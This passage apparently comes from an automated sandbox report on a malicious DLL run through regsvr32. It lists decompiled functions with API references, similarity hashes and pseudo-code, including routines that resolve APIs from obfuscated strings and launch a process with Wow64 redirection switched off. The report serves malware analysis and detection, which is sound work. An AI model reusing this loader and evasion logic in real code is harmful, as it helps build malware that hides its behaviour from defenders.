                                    • _free.LIBCMT ref: 6E2C8FF1
                                    • _free.LIBCMT ref: 6E2C8FFF
                                    • _free.LIBCMT ref: 6E2C900A
                                    • _free.LIBCMT ref: 6E2C9042
                                    • _free.LIBCMT ref: 6E2C9049
                                    • _free.LIBCMT ref: 6E2C9066
                                    • _free.LIBCMT ref: 6E2C907E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID: 8f/n
                                    • API String ID: 161543041-3768044786
                                    • Opcode ID: f609f4e0d79902927b3c15cd604cd1d8b33695c1d946bf439eb73b4e54cf67ff
                                    • Instruction ID: 663ef0f6f7beb9524ddc9d93b0e2171ee89d0db11ae7d0fdd64cdd8f456a8b0e
                                    • Opcode Fuzzy Hash: f609f4e0d79902927b3c15cd604cd1d8b33695c1d946bf439eb73b4e54cf67ff
                                    • Instruction Fuzzy Hash: B431AF3190460A9FEBE09AB9DC05B86B3EBEF00B15F604E19E469C7190DB71E850CB16
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C6C1C, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 6E2C6C30
                                      • Part of subcall function 6E2C761D: HeapFree.KERNEL32(00000000,00000000), ref: 6E2C7633
                                      • Part of subcall function 6E2C761D: GetLastError.KERNEL32(?,?,6E2CA4CC,?,00000000,?,00000000,?,6E2CA4F3,?,00000007,?,?,6E2C90D9,?,?), ref: 6E2C7645
                                    • _free.LIBCMT ref: 6E2C6C3C
                                    • _free.LIBCMT ref: 6E2C6C47
                                    • _free.LIBCMT ref: 6E2C6C52
                                    • _free.LIBCMT ref: 6E2C6C5D
                                    • _free.LIBCMT ref: 6E2C6C68
                                    • _free.LIBCMT ref: 6E2C6C73
                                    • _free.LIBCMT ref: 6E2C6C7E
                                    • _free.LIBCMT ref: 6E2C6C89
                                    • _free.LIBCMT ref: 6E2C6C97
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 43d555be3b6a8d188c4a086bdc3a879d9c116a495f9c58dc6efa8e7a93394e03
                                    • Instruction ID: 584aad0b4f7d0705940e851dff4550223fb27b6e4f88a623ae5cc286f468b609
                                    • Opcode Fuzzy Hash: 43d555be3b6a8d188c4a086bdc3a879d9c116a495f9c58dc6efa8e7a93394e03
                                    • Instruction Fuzzy Hash: 9211A77951010CAFCF81DFA8CC46CD93B6AEF04B54B214AA5BA194F161DB31DA509F82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A3D9E, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 27%
                                    			E001A3D9E(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x1aa38c; // 0x32f9e00
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E001A6AF5(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x1a91ac;
				}
				_t46 = E001A5D9A(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E001A77D7(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x1aa2d4; // 0x314d7d0
						_t16 = _t75 + 0x1abab8; // 0x530025
						 *0x1aa138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E001A6AF5(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x1a91b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E001A77D7(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E001A77EC(_v20);
						} else {
							_t66 =  *0x1aa2d4; // 0x314d7d0
							_t31 = _t66 + 0x1abbd8; // 0x73006d
							 *0x1aa138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E001A77EC(_v12);
				}
				return _v24;
			}




























                                    0x001a3da6
                                    0x001a3dac
                                    0x001a3db3
                                    0x001a3db9
                                    0x001a3dbd
                                    0x001a3dc1
                                    0x001a3dc4
                                    0x001a3dcb
                                    0x001a3dce
                                    0x001a3dd0
                                    0x001a3dd0
                                    0x001a3dd9
                                    0x001a3de0
                                    0x001a3de3
                                    0x001a3de9
                                    0x001a3df3
                                    0x001a3dfc
                                    0x001a3e03
                                    0x001a3e1c
                                    0x001a3e23
                                    0x001a3e26
                                    0x001a3e2f
                                    0x001a3e38
                                    0x001a3e49
                                    0x001a3e52
                                    0x001a3e56
                                    0x001a3e5a
                                    0x001a3e61
                                    0x001a3e64
                                    0x001a3e66
                                    0x001a3e66
                                    0x001a3e70
                                    0x001a3e79
                                    0x001a3e80
                                    0x001a3e98
                                    0x001a3e9c
                                    0x001a3ed9
                                    0x001a3e9e
                                    0x001a3ea1
                                    0x001a3ea9
                                    0x001a3eba
                                    0x001a3ec6
                                    0x001a3ece
                                    0x001a3ed2
                                    0x001a3ed2
                                    0x001a3e9c
                                    0x001a3ee1
                                    0x001a3ee6
                                    0x001a3eed

                                    APIs
                                    • GetTickCount.KERNEL32(?,001A462D), ref: 001A3DB3
                                    • lstrlen.KERNEL32(?,80000002,00000005), ref: 001A3DF3
                                    • lstrlen.KERNEL32(00000000), ref: 001A3DFC
                                    • lstrlen.KERNEL32(00000000), ref: 001A3E03
                                    • lstrlenW.KERNEL32(80000002), ref: 001A3E10
                                    • lstrlen.KERNEL32(?,00000004), ref: 001A3E70
                                    • lstrlen.KERNEL32(?), ref: 001A3E79
                                    • lstrlen.KERNEL32(?), ref: 001A3E80
                                    • lstrlenW.KERNEL32(?), ref: 001A3E87
                                      • Part of subcall function 001A77EC: HeapFree.KERNEL32(00000000,00000000,001A1333), ref: 001A77F8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: lstrlen$CountFreeHeapTick
                                    • String ID:
                                    • API String ID: 2535036572-0
                                    • Opcode ID: 2258cf28f6e833c5ee5580600e713b88a24b5dd11d8319af85ab4da2dccc3545
                                    • Instruction ID: 2baaf0c51160b1191ec10cf0586b36304737ba280d6833fbc80e89c9100cccd7
                                    • Opcode Fuzzy Hash: 2258cf28f6e833c5ee5580600e713b88a24b5dd11d8319af85ab4da2dccc3545
                                    • Instruction Fuzzy Hash: A9416A7A900219FBCF11AFA4CD08A9E7BB5EF49354F154090FE04A7262D7369B54EB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A4BD9, Relevance: 13.6, APIs: 9, Instructions: 110librarymemoryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 61%
                                    			E001A4BD9(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E001A2039(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E001A7801( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x1aa2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x1aa2d4; // 0x314d7d0
					_t18 = _t50 + 0x1ab55b; // 0x73797325
					_t52 = E001A6ECF(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x1aa2d4; // 0x314d7d0
						_t20 = _t53 + 0x1ab73d; // 0x32f8f0d
						_t21 = _t53 + 0x1ab0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x1aa290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E001A77EC(_t76);
				goto L12;
			}



















                                    0x001a4be2
                                    0x001a4be2
                                    0x001a4bf0
                                    0x001a4bf9
                                    0x001a4bfc
                                    0x001a4d0e
                                    0x001a4d15
                                    0x001a4d15
                                    0x001a4c0b
                                    0x001a4c13
                                    0x001a4c18
                                    0x001a4c1b
                                    0x001a4c30
                                    0x001a4c36
                                    0x001a4c37
                                    0x001a4c3a
                                    0x001a4c40
                                    0x001a4c43
                                    0x001a4c48
                                    0x001a4c50
                                    0x001a4c57
                                    0x001a4c5e
                                    0x001a4c61
                                    0x001a4cf5
                                    0x001a4c67
                                    0x001a4c67
                                    0x001a4c6c
                                    0x001a4c73
                                    0x001a4c87
                                    0x001a4c8b
                                    0x001a4cdc
                                    0x001a4c8d
                                    0x001a4c8d
                                    0x001a4c94
                                    0x001a4c9b
                                    0x001a4cb3
                                    0x001a4cb9
                                    0x001a4cbd
                                    0x001a4cd7
                                    0x001a4cbf
                                    0x001a4cc8
                                    0x001a4ccd
                                    0x001a4ccd
                                    0x001a4cbd
                                    0x001a4ced
                                    0x001a4ced
                                    0x001a4c61
                                    0x001a4cfc
                                    0x001a4d05
                                    0x001a4d09
                                    0x00000000

                                    APIs
                                      • Part of subcall function 001A2039: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,001A4BF5,?,?,?,?,00000000,00000000), ref: 001A205E
                                      • Part of subcall function 001A2039: GetProcAddress.KERNEL32(00000000,7243775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A2080
                                      • Part of subcall function 001A2039: GetProcAddress.KERNEL32(00000000,614D775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A2096
                                      • Part of subcall function 001A2039: GetProcAddress.KERNEL32(00000000,6E55775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A20AC
                                      • Part of subcall function 001A2039: GetProcAddress.KERNEL32(00000000,4E6C7452,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A20C2
                                      • Part of subcall function 001A2039: GetProcAddress.KERNEL32(00000000,6C43775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A20D8
                                    • memset.NTDLL ref: 001A4C43
                                      • Part of subcall function 001A6ECF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,001A4C5C,73797325), ref: 001A6EE0
                                      • Part of subcall function 001A6ECF: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 001A6EFA
                                    • GetModuleHandleA.KERNEL32(4E52454B,032F8F0D,73797325), ref: 001A4C7A
                                    • GetProcAddress.KERNEL32(00000000), ref: 001A4C81
                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 001A4C9B
                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 001A4CB9
                                    • CloseHandle.KERNEL32(00000000), ref: 001A4CC8
                                    • CloseHandle.KERNEL32(?), ref: 001A4CCD
                                    • GetLastError.KERNEL32 ref: 001A4CD1
                                    • HeapFree.KERNEL32(00000000,?), ref: 001A4CED
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                    • String ID:
                                    • API String ID: 91923200-0
                                    • Opcode ID: 950da1a5cf613c4f8789d8ef60b0a01cd830b1253e4e0523e07b41255d400301
                                    • Instruction ID: 4786462bf85834d1a43bb4cce7c3f98f64277367e8754a886db90167172014e7
                                    • Opcode Fuzzy Hash: 950da1a5cf613c4f8789d8ef60b0a01cd830b1253e4e0523e07b41255d400301
                                    • Instruction Fuzzy Hash: 26316879901218EFCB119FE4DD48ADEBFB8EF4A350F204051F509A3121C775AA85DBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2CA70F, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleCP.KERNEL32 ref: 6E2CA751
                                    • __fassign.LIBCMT ref: 6E2CA7CC
                                    • __fassign.LIBCMT ref: 6E2CA7E7
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 6E2CA80D
                                    • WriteFile.KERNEL32(?,?,00000000,6E2CAE84,00000000), ref: 6E2CA82C
                                    • WriteFile.KERNEL32(?,?,00000001,6E2CAE84,00000000), ref: 6E2CA865
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID:
                                    • API String ID: 1324828854-0
                                    • Opcode ID: fe6c7dee24c67754930c850e23cf3a04e7cad20d86e64c15b0dae96bc008fd00
                                    • Instruction ID: a4d73696fb2a4cb586743ace3f296f72de01bc1d60420874ec391c87d526880e
                                    • Opcode Fuzzy Hash: fe6c7dee24c67754930c850e23cf3a04e7cad20d86e64c15b0dae96bc008fd00
                                    • Instruction Fuzzy Hash: 7651A3B194024D9FDB40CFE8D885AEEBBBAFF09710F14461AE566E7280E7709941CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2CA4DA, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 6E2CA49E: _free.LIBCMT ref: 6E2CA4C7
                                    • _free.LIBCMT ref: 6E2CA528
                                      • Part of subcall function 6E2C761D: HeapFree.KERNEL32(00000000,00000000), ref: 6E2C7633
                                      • Part of subcall function 6E2C761D: GetLastError.KERNEL32(?,?,6E2CA4CC,?,00000000,?,00000000,?,6E2CA4F3,?,00000007,?,?,6E2C90D9,?,?), ref: 6E2C7645
                                    • _free.LIBCMT ref: 6E2CA533
                                    • _free.LIBCMT ref: 6E2CA53E
                                    • _free.LIBCMT ref: 6E2CA592
                                    • _free.LIBCMT ref: 6E2CA59D
                                    • _free.LIBCMT ref: 6E2CA5A8
                                    • _free.LIBCMT ref: 6E2CA5B3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: f4371d2fd168166f85a9f3178bf51c2b87afea5821cdea0538c50897a6f4803b
                                    • Instruction ID: 9aeee2fd557bd9112e3c243c43ce61377dc0194e0026c38971c19604c2da8e75
                                    • Opcode Fuzzy Hash: f4371d2fd168166f85a9f3178bf51c2b87afea5821cdea0538c50897a6f4803b
                                    • Instruction Fuzzy Hash: A511F1B5980B0CB7DAB1ABF0CC0AFC777AE7F04B04F404E15629A66491DF65A5148B52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C6D3C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,6E2C7EEB), ref: 6E2C6D40
                                    • _free.LIBCMT ref: 6E2C6D73
                                    • _free.LIBCMT ref: 6E2C6D9B
                                    • SetLastError.KERNEL32(00000000,?,?,6E2C7EEB), ref: 6E2C6DA8
                                    • SetLastError.KERNEL32(00000000,?,?,6E2C7EEB), ref: 6E2C6DB4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID: e
                                    • API String ID: 3170660625-3352636342
                                    • Opcode ID: 5bc92fdcbd2ed48f1e55119b898106042a78130af5f728b19499137945d8953a
                                    • Instruction ID: a3099bb3cb9c983766b6397650b66e9b500a3dbf25eaa9f5c856540f613f873a
                                    • Opcode Fuzzy Hash: 5bc92fdcbd2ed48f1e55119b898106042a78130af5f728b19499137945d8953a
                                    • Instruction Fuzzy Hash: C8F0FE391A4D0E57CAC113F8DD8DEAA122F9FC2F39F250714F518921C4DF6588018173
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A19B4, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001A740B: CoCreateInstance.OLE32(9BA05972,00000000,00000004,032F8C18,00000000), ref: 001A743E
                                    • SysAllocString.OLEAUT32(?), ref: 001A1A10
                                    • SysAllocString.OLEAUT32(0070006F), ref: 001A1A24
                                    • SysAllocString.OLEAUT32(00000000), ref: 001A1A36
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A1A9A
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A1AA9
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A1AB4
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: String$AllocFree$CreateInstance
                                    • String ID:
                                    • API String ID: 1867060851-0
                                    • Opcode ID: ac4d104d53351ae3d1d628d2c646c0dca449288a4cda65c3d1a5304f7ee43898
                                    • Instruction ID: 53d5e42d8d0e198c0b9c0b331373d73959523cd86eacbac6ae18305010c7a857
                                    • Opcode Fuzzy Hash: ac4d104d53351ae3d1d628d2c646c0dca449288a4cda65c3d1a5304f7ee43898
                                    • Instruction Fuzzy Hash: FA318136D00609AFDF01DFB8C844A9FBBBAAF4A310F154425ED10EB120DB719D46CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A2039, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E001A2039(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E001A77D7(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x1aa2d4; // 0x314d7d0
					_t1 = _t23 + 0x1ab11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x1aa2d4; // 0x314d7d0
					_t2 = _t26 + 0x1ab787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E001A77EC(_t54);
					} else {
						_t30 =  *0x1aa2d4; // 0x314d7d0
						_t5 = _t30 + 0x1ab774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x1aa2d4; // 0x314d7d0
							_t7 = _t33 + 0x1ab797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x1aa2d4; // 0x314d7d0
								_t9 = _t36 + 0x1ab756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x1aa2d4; // 0x314d7d0
									_t11 = _t39 + 0x1ab7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E001A3C64(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                    0x001a2048
                                    0x001a204c
                                    0x001a210e
                                    0x001a2052
                                    0x001a2052
                                    0x001a2057
                                    0x001a206a
                                    0x001a206c
                                    0x001a2071
                                    0x001a2079
                                    0x001a2080
                                    0x001a2084
                                    0x001a2087
                                    0x001a2106
                                    0x001a2107
                                    0x001a2089
                                    0x001a2089
                                    0x001a208e
                                    0x001a2096
                                    0x001a209a
                                    0x001a209d
                                    0x00000000
                                    0x001a209f
                                    0x001a209f
                                    0x001a20a4
                                    0x001a20ac
                                    0x001a20b0
                                    0x001a20b3
                                    0x00000000
                                    0x001a20b5
                                    0x001a20b5
                                    0x001a20ba
                                    0x001a20c2
                                    0x001a20c6
                                    0x001a20c9
                                    0x00000000
                                    0x001a20cb
                                    0x001a20cb
                                    0x001a20d0
                                    0x001a20d8
                                    0x001a20dc
                                    0x001a20df
                                    0x00000000
                                    0x001a20e1
                                    0x001a20e7
                                    0x001a20ec
                                    0x001a20f3
                                    0x001a20fa
                                    0x001a20fd
                                    0x00000000
                                    0x001a20ff
                                    0x001a2102
                                    0x001a2102
                                    0x001a20fd
                                    0x001a20df
                                    0x001a20c9
                                    0x001a20b3
                                    0x001a209d
                                    0x001a2087
                                    0x001a211c

                                    APIs
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,001A4BF5,?,?,?,?,00000000,00000000), ref: 001A205E
                                    • GetProcAddress.KERNEL32(00000000,7243775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A2080
                                    • GetProcAddress.KERNEL32(00000000,614D775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A2096
                                    • GetProcAddress.KERNEL32(00000000,6E55775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A20AC
                                    • GetProcAddress.KERNEL32(00000000,4E6C7452,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A20C2
                                    • GetProcAddress.KERNEL32(00000000,6C43775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A20D8
                                      • Part of subcall function 001A3C64: memset.NTDLL ref: 001A3CE3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressProc$AllocateHandleHeapModulememset
                                    • String ID:
                                    • API String ID: 1886625739-0
                                    • Opcode ID: 68dcd5972cc145f57e5be571ed9e8f9ff850678aca5a7e4d80848a75ec63fd2a
                                    • Instruction ID: 4d703aa8960adacb1fffc90cce79f958e72fda087f0b57f77749837e7b3e96d4
                                    • Opcode Fuzzy Hash: 68dcd5972cc145f57e5be571ed9e8f9ff850678aca5a7e4d80848a75ec63fd2a
                                    • Instruction Fuzzy Hash: 6D219AB520434AAFD710DFA8CD84E6A7BFCEF4A350B11406AF908C7252E738E904CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C4CF6, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,6E2C49B8,6E2C39D0,6E2C33DA), ref: 6E2C4D04
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2C4D12
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2C4D2B
                                    • SetLastError.KERNEL32(00000000,?,6E2C49B8,6E2C39D0,6E2C33DA), ref: 6E2C4D7D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 36e973c67cb725f467542caaafa98e4ef51df2d742f9224c1283eba3a1563535
                                    • Instruction ID: ff6ba6ac8d5cf30012525bce9827846ac9bf424b8e31770d3d08974bb887879c
                                    • Opcode Fuzzy Hash: 36e973c67cb725f467542caaafa98e4ef51df2d742f9224c1283eba3a1563535
                                    • Instruction Fuzzy Hash: E901F93266DF1B5FDAD026F5ECC89672E6BEB06F7D720032DE115800E4DF918802C196
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A5AFA, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 88%
                                    			E001A5AFA(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
